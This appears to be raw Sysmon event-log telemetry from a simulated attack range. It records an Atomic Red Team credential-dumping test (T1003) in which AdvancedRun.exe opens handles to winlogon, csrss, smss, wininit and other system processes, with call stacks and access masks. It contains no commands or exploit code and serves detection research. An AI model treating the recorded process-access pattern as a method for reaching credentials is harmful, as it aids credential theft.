17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942770Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942769Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942768Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942767Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942766Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942765Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942764Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942763Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942762Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003942761Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942760Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942759Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000003942758Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003942757Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942756Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942755Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942754Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942753Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 